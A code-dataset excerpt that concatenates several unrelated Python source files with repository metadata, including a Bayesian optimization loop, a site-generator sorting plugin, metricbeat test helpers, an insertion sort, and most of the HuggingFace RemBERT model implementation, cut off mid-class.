step. Models and acquisition state are copied using `copy.deepcopy`.
:return: An :class:`OptimizationResult`. The :attr:`final_result` element contains either
the final optimization data, models and acquisition state, or, if an exception was
raised while executing the optimization loop, it contains the exception raised. In
either case, the :attr:`history` element is the history of the data, models and
acquisition state at the *start* of each optimization step (up to and including any step
that fails to complete). The history will never include the final optimization result.
:raise ValueError: If any of the following are true:
- ``num_steps`` is negative.
- the keys in ``datasets`` and ``model_specs`` do not match
- ``datasets`` or ``model_specs`` are empty
- the default `acquisition_rule` is used and the tags are not `OBJECTIVE`.
"""
if num_steps < 0:
raise ValueError(f"num_steps must be at least 0, got {num_steps}")
if datasets.keys() != model_specs.keys():
raise ValueError(
f"datasets and model_specs should contain the same keys. Got {datasets.keys()} and"
f" {model_specs.keys()} respectively."
)
if not datasets:
raise ValueError("dicts of datasets and model_specs must be populated.")
if acquisition_rule is None:
if datasets.keys() != {OBJECTIVE}:
raise ValueError(
f"Default acquisition rule EfficientGlobalOptimization requires tag"
f" {OBJECTIVE!r}, got keys {datasets.keys()}"
)
acquisition_rule = cast(AcquisitionRule[S, SP], EfficientGlobalOptimization())
models = {tag: create_model(spec) for tag, spec in model_specs.items()}
history: List[Record[S]] = []
for step in range(num_steps):
if track_state:
history.append(Record(datasets, models, acquisition_state))
try:
if track_state:
models = {tag: gpflow.utilities.deepcopy(m) for tag, m in models.items()}
acquisition_state = copy.deepcopy(acquisition_state)
query_points, acquisition_state = acquisition_rule.acquire(
self._search_space, datasets, models, acquisition_state
)
observer_output = self._observer(query_points)
datasets = {tag: datasets[tag] + observer_output[tag] for tag in observer_output}
for tag, model in models.items():
dataset = datasets[tag]
model.update(dataset)
model.optimize(dataset)
except Exception as error:
tf.print(
f"\nOptimization failed at step {step}, encountered error with traceback:"
f"\n{traceback.format_exc()}"
f"\nTerminating optimization and returning the optimization history. You may "
f"be able to use the history to restart the process from a previous successful "
f"optimization step.\n",
output_stream=logging.ERROR,
)
return OptimizationResult(Err(error), history)
tf.print("Optimization completed without errors", output_stream=logging.INFO)
record = Record(datasets, models, acquisition_state)
return OptimizationResult(Ok(record), history)
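A framework-free sketch of the loop that optimize() describes (acquire new query points, observe once, extend the data, retrain the models). The helper names (acquire, observer, model, dataset) are placeholders standing in for the rule, observer and model objects, not trieste APIs.
def bo_loop(num_steps, dataset, model, observer, acquire):
    history = []
    for _ in range(num_steps):
        history.append((dataset, model))         # snapshot, analogous to Record
        query_points = acquire(model, dataset)   # acquisition rule proposes points
        new_data = observer(query_points)        # query the black box once
        dataset = dataset + new_data             # extend the known data
        model.update(dataset)                    # condition the model on the new data
        model.optimize(dataset)                  # retrain hyperparameters
    return dataset, model, history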
| 42.96337
| 100
| 0.652571
|
61f8ab12d5ea6d3f99988ab7a541d702cc3e7582
| 528
|
py
|
Python
|
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | null | null | null |
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | 1
|
2020-01-18T21:09:05.000Z
|
2020-01-18T21:09:05.000Z
|
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | null | null | null |
from sitefab.plugins import CollectionProcessor
from sitefab.SiteFab import SiteFab
class SortCollection(CollectionProcessor):
"""
Sort Collection
"""
def process(self, collection, site, config):
if config.sort_by == "udpate_date":
k = lambda x: x.meta.update_date_ts
else:
k = lambda x: x.meta.creation_date_ts
# note: recall sort do sorting in place!
collection.posts.sort(key=k, reverse=True)
return (SiteFab.OK, collection.meta.name, "")
| 25.142857
| 53
| 0.649621
|
8308a9c0e765996a679253c0505db2ba5988d2f7
| 2,984
|
py
|
Python
|
metricbeat/tests/system/metricbeat.py
|
wklken/beats
|
60e8999da198f1c8c4242c8afc77e39a82b6e47f
|
[
"Apache-2.0"
] | 16
|
2018-08-22T03:29:31.000Z
|
2021-09-05T14:01:10.000Z
|
vendor/github.com/elastic/beats/metricbeat/tests/system/metricbeat.py
|
railroadmanuk/rubrikbeat
|
af012076d68f64e12092d885257aa5a706453695
|
[
"MIT"
] | 3
|
2020-05-29T13:53:51.000Z
|
2021-06-01T22:19:56.000Z
|
metricbeat/tests/system/metricbeat.py
|
sure0000/beats
|
1690690b3fcbe4a46aedc1121f9aa128497ed22d
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2018-10-31T06:55:01.000Z
|
2021-02-06T18:50:04.000Z
|
import re
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
COMMON_FIELDS = ["@timestamp", "beat", "metricset.name", "metricset.host",
"metricset.module", "metricset.rtt", "host.name"]
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
import logging
logging.getLogger("urllib3").setLevel(logging.WARNING)
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "metricbeat"
self.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
super(BaseTest, self).setUpClass()
def de_dot(self, existing_fields):
fields = {}
# Dedot first level of dots
for key in existing_fields:
parts = key.split('.', 1)
if len(parts) > 1:
if parts[0] not in fields:
fields[parts[0]] = {}
fields[parts[0]][parts[1]] = parts[1]
else:
fields[parts[0]] = parts[0]
# Dedot further levels recursively
for key in fields:
if type(fields[key]) is dict:
fields[key] = self.de_dot(fields[key])
return fields
def assert_no_logged_warnings(self, replace=None):
"""
Assert that the log file contains no ERROR or WARN lines.
"""
log = self.get_log()
        pattern = self.build_log_regex(r"\[cfgwarn\]")
log = pattern.sub("", log)
# Jenkins runs as a Windows service and when Jenkins executes these
# tests the Beat is confused since it thinks it is running as a service.
pattern = self.build_log_regex("The service process could not connect to the service controller.")
log = pattern.sub("", log)
if replace:
for r in replace:
pattern = self.build_log_regex(r)
log = pattern.sub("", log)
self.assertNotRegexpMatches(log, "\tERROR\t|\tWARN\t")
def build_log_regex(self, message):
return re.compile(r"^.*\t(?:ERROR|WARN)\t.*" + message + r".*$", re.MULTILINE)
def check_metricset(self, module, metricset, hosts, fields=[], extras=[]):
"""
Method to test a metricset for its fields
"""
self.render_config_template(modules=[{
"name": module,
"metricsets": [metricset],
"hosts": hosts,
"period": "1s",
"extras": extras,
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
self.assert_no_logged_warnings()
output = self.read_output_json()
self.assertTrue(len(output) >= 1)
evt = output[0]
print(evt)
fields = COMMON_FIELDS + fields
self.assertItemsEqual(self.de_dot(fields), evt.keys())
self.assert_fields_are_documented(evt)
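# Standalone sketch of what de_dot() above computes: dotted field names are expanded
# one level at a time into nested dicts whose leaves are the last path segment. This
# free function mirrors the method's logic purely for illustration.
def de_dot_example(existing_fields):
    fields = {}
    for key in existing_fields:
        parts = key.split('.', 1)
        if len(parts) > 1:
            fields.setdefault(parts[0], {})[parts[1]] = parts[1]
        else:
            fields[parts[0]] = parts[0]
    for key in fields:
        if isinstance(fields[key], dict):
            fields[key] = de_dot_example(fields[key])
    return fields
assert de_dot_example(["metricset.name", "metricset.module", "@timestamp"]) == {
    "metricset": {"name": "name", "module": "module"},
    "@timestamp": "@timestamp",
}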
| 31.083333
| 106
| 0.585791
|
c83b69fd158065e639c1686070d711adaa3e431c
| 802
|
py
|
Python
|
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | 1
|
2019-03-24T13:12:01.000Z
|
2019-03-24T13:12:01.000Z
|
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
"""
Insertion sort implementation in Python 3
https://en.wikipedia.org/wiki/Insertion_sort
"""
def insertion_sort(lis):
"""
    Iterative implementation of insertion sort.
:param lis: list to be sorted
"""
for i in range(len(lis)):
j = i
while j > 0 and lis[j-1] > lis[j]:
lis[j], lis[j-1] = lis[j-1], lis[j]
j -= 1
return lis
def main():
lis1 = [4, 1, 2, 3, 9]
lis2 = [1]
lis3 = [2, 2, 1, -1, 0, 4, 5, 2]
lis4 = []
lis1 = insertion_sort(lis1)
assert lis1 == [1, 2, 3, 4, 9]
lis2 = insertion_sort(lis2)
assert lis2 == [1]
lis3 = insertion_sort(lis3)
assert lis3 == [-1, 0, 1, 2, 2, 2, 4, 5]
lis4 = insertion_sort(lis4)
assert lis4 == []
if __name__ == '__main__':
main()
| 20.05
| 51
| 0.53616
|
d1885b57ddd77b2321796e9b002f318845988c63
| 161
|
py
|
Python
|
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | 1
|
2020-01-16T01:56:41.000Z
|
2020-01-16T01:56:41.000Z
|
from tests.utils import W3CTestCase
class TestFlexbox_ItemTopFloat(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_item-top-float'))
| 26.833333
| 77
| 0.807453
|
46524ce9cbb8b6ee99d921274a755bd48f7c5fba
| 63,922
|
py
|
Python
|
src/transformers/models/rembert/modeling_rembert.py
|
holazzer/transformers
|
53191d75ecca21c028077b3227f9ac47379e4690
|
[
"Apache-2.0"
] | 28
|
2021-09-15T01:25:00.000Z
|
2022-03-01T20:21:28.000Z
|
src/transformers/models/rembert/modeling_rembert.py
|
Hecim1984/transformers
|
8e908c8c74f556a82534f4cf1e7a1b4f7b55d24c
|
[
"Apache-2.0"
] | 1
|
2021-08-09T01:51:17.000Z
|
2021-08-09T01:51:17.000Z
|
src/transformers/models/rembert/modeling_rembert.py
|
Hecim1984/transformers
|
8e908c8c74f556a82534f4cf1e7a1b4f7b55d24c
|
[
"Apache-2.0"
] | 1
|
2021-12-21T12:23:30.000Z
|
2021-12-21T12:23:30.000Z
|
# coding=utf-8
# Copyright 2021 The HuggingFace Team The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch RemBERT model. """
import math
import os
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...file_utils import (
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
BaseModelOutputWithPoolingAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import (
PreTrainedModel,
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from ...utils import logging
from .configuration_rembert import RemBertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "RemBertConfig"
_TOKENIZER_FOR_DOC = "RemBertTokenizer"
_CHECKPOINT_FOR_DOC = "google/rembert"
REMBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"google/rembert",
# See all RemBERT models at https://huggingface.co/models?filter=rembert
]
def load_tf_weights_in_rembert(model, config, tf_checkpoint_path):
"""Load tf checkpoints in a pytorch model."""
try:
import re
import numpy as np
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(tf_checkpoint_path)
logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
        # The checkpoint is ~12 GB; save memory by not loading variables we do not need
# Output embedding and cls are reset at classification time
if any(deny in name for deny in ("adam_v", "adam_m", "output_embedding", "cls")):
# logger.info("Skipping loading of %s", name)
continue
logger.info(f"Loading TF weight {name} with shape {shape}")
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
# Replace prefix with right one
name = name.replace("bert/", "rembert/")
# The pooler is a linear layer
# name = name.replace("pooler/dense", "pooler")
name = name.split("/")
        # adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculate m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
):
logger.info(f"Skipping {'/'.join(name)}")
continue
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
scope_names = re.split(r"_(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "kernel" or scope_names[0] == "gamma":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "output_weights":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "squad":
pointer = getattr(pointer, "classifier")
else:
try:
pointer = getattr(pointer, scope_names[0])
except AttributeError:
logger.info("Skipping {}".format("/".join(name)))
continue
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if m_name[-11:] == "_embeddings":
pointer = getattr(pointer, "weight")
elif m_name == "kernel":
array = np.transpose(array)
try:
assert (
pointer.shape == array.shape
), f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched"
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info(f"Initialize PyTorch weight {name}")
pointer.data = torch.from_numpy(array)
return model
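# Quick illustration of the scope-name handling above: TF variable names such as
# "layer_3" are split into a base name and an index so the loader can descend into
# the matching PyTorch submodule list (e.g. encoder.layer[3]).
import re
assert re.fullmatch(r"[A-Za-z]+_\d+", "layer_3") is not None
assert re.split(r"_(\d+)", "layer_3") == ["layer", "3", ""]
assert re.fullmatch(r"[A-Za-z]+_\d+", "kernel") is None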
class RemBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(
config.vocab_size, config.input_embedding_size, padding_idx=config.pad_token_id
)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.input_embedding_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.input_embedding_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = nn.LayerNorm(config.input_embedding_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
def forward(
self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0
):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
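# Illustration of the registered position_ids buffer and the past_key_values_length
# slice used in forward() above; the sizes are illustrative only.
import torch
max_position_embeddings = 8
position_ids = torch.arange(max_position_embeddings).expand((1, -1))
past_key_values_length, seq_length = 3, 2
window = position_ids[:, past_key_values_length : seq_length + past_key_values_length]
assert window.tolist() == [[3, 4]]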
# Copied from transformers.models.bert.modeling_bert.BertPooler with Bert->RemBert
class RemBertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class RemBertSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
f"heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size)
self.key = nn.Linear(config.hidden_size, self.all_head_size)
self.value = nn.Linear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.is_decoder = config.is_decoder
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
mixed_query_layer = self.query(hidden_states)
# If this is instantiated as a cross-attention module, the keys
# and values come from an encoder; the attention mask needs to be
# such that the encoder's padding tokens are not attended to.
is_cross_attention = encoder_hidden_states is not None
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_layer = past_key_value[0]
value_layer = past_key_value[1]
attention_mask = encoder_attention_mask
elif is_cross_attention:
key_layer = self.transpose_for_scores(self.key(encoder_hidden_states))
value_layer = self.transpose_for_scores(self.value(encoder_hidden_states))
attention_mask = encoder_attention_mask
elif past_key_value is not None:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
key_layer = torch.cat([past_key_value[0], key_layer], dim=2)
value_layer = torch.cat([past_key_value[1], value_layer], dim=2)
else:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_layer, value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
            # Apply the attention mask (precomputed for all layers in RemBertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
if self.is_decoder:
outputs = outputs + (past_key_value,)
return outputs
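# Condensed sketch of the attention math implemented by RemBertSelfAttention: per-head
# Q/K/V of shape (batch, heads, seq, head_size), scaled dot-product scores, softmax over
# the keys, then a weighted sum of the values. Tensor sizes are illustrative only.
import math
import torch
batch, heads, seq, head_size = 2, 4, 5, 8
q = torch.randn(batch, heads, seq, head_size)
k = torch.randn(batch, heads, seq, head_size)
v = torch.randn(batch, heads, seq, head_size)
scores = torch.matmul(q, k.transpose(-1, -2)) / math.sqrt(head_size)
probs = torch.softmax(scores, dim=-1)  # each row sums to 1 over the key positions
context = torch.matmul(probs, v)  # (batch, heads, seq, head_size)
assert context.shape == (batch, heads, seq, head_size)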
# Copied from transformers.models.bert.modeling_bert.BertSelfOutput with Bert->RemBert
class RemBertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertAttention with Bert->RemBert
class RemBertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = RemBertSelfAttention(config)
self.output = RemBertSelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
self_outputs = self.self(
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.bert.modeling_bert.BertIntermediate with Bert->RemBert
class RemBertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertOutput with Bert->RemBert
class RemBertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertLayer with Bert->RemBert
class RemBertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = RemBertAttention(config)
self.is_decoder = config.is_decoder
self.add_cross_attention = config.add_cross_attention
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention = RemBertAttention(config)
self.intermediate = RemBertIntermediate(config)
self.output = RemBertOutput(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
past_key_value=self_attn_past_key_value,
)
attention_output = self_attention_outputs[0]
# if decoder, the last output is tuple of self-attn cache
if self.is_decoder:
outputs = self_attention_outputs[1:-1]
present_key_value = self_attention_outputs[-1]
else:
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
cross_attn_present_key_value = None
if self.is_decoder and encoder_hidden_states is not None:
assert hasattr(
self, "crossattention"
), f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers by setting `config.add_cross_attention=True`"
# cross_attn cached key/values tuple is at positions 3,4 of past_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
cross_attn_past_key_value,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:-1] # add cross attentions if we output attention weights
# add cross-attn cache to positions 3,4 of present_key_value tuple
cross_attn_present_key_value = cross_attention_outputs[-1]
present_key_value = present_key_value + cross_attn_present_key_value
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
# if decoder, return the attn key/values as the last output
if self.is_decoder:
outputs = outputs + (present_key_value,)
return outputs
def feed_forward_chunk(self, attention_output):
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
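# Conceptual sketch of feed-forward chunking (not the exact implementation of
# apply_chunking_to_forward): the sequence dimension is split into chunks, the
# feed-forward function is applied per chunk, and the results are concatenated,
# trading peak memory for extra kernel launches.
import torch
def feed_forward(x):
    return x * 2.0
hidden = torch.randn(2, 6, 4)  # (batch, seq, hidden)
chunks = [feed_forward(c) for c in hidden.split(3, dim=1)]
out = torch.cat(chunks, dim=1)
assert torch.allclose(out, feed_forward(hidden))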
class RemBertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.embedding_hidden_mapping_in = nn.Linear(config.input_embedding_size, config.hidden_size)
self.layer = nn.ModuleList([RemBertLayer(config) for _ in range(config.num_hidden_layers)])
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=False,
output_hidden_states=False,
return_dict=True,
):
hidden_states = self.embedding_hidden_mapping_in(hidden_states)
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
next_decoder_cache = () if use_cache else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
past_key_value = past_key_values[i] if past_key_values is not None else None
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warn(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, past_key_value, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
)
else:
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[-1],)
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (layer_outputs[2],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [
hidden_states,
next_decoder_cache,
all_hidden_states,
all_self_attentions,
all_cross_attentions,
]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_decoder_cache,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
# Copied from transformers.models.bert.modeling_bert.BertPredictionHeadTransform with Bert->RemBert
class RemBertPredictionHeadTransform(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class RemBertLMPredictionHead(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.output_embedding_size)
